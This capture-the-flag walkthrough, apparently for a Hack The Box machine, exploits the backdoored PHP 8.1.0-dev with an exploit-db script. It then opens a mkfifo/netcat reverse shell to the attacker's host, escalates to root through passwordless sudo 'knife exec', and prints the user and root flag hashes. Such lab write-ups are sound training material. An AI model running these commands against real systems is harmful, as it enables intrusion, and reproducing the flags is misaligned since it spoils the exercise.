Enumeration
As usual, let's start with nmap:
nmap -sV -sC 10.10.10.242
curl -I 10.10.10.242
Let's google php/8.1.0-dev exploit and see what we can find.
We find this exploit on exploit-db: https://www.exploit-db.com/exploits/49933
It says:
"An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell on the host."
Let's download the exploit to our VM
python3 49933.pyEnter the url of the target machine
We got the shell!
id
The shell is not very interactive, it doesn't respond to the cd command, but we can use this trick:
From your VM, open a new command prompt and type
nc -lnvp 1234
Now from the target's machine type:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f
Now go back to your netcat (nc) if you've got a shell!
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now we have a proper shell!
219a816d297ab93af1acdf0989cbe5c4
Congratulations! You got the user flag!
Now let's try to get the root flag:
Access is denied so we need to escalate our privileges.
Privilege Escalation
sudo -l
This means the command knife can be called as root without providing any passwords!
After googling how to use knife, we come up with this command:
sudo knife exec -E 'system("cat /root/root.txt")'
286187c400154744a5fe9a38e9229798
Congratulations! You got the root flag!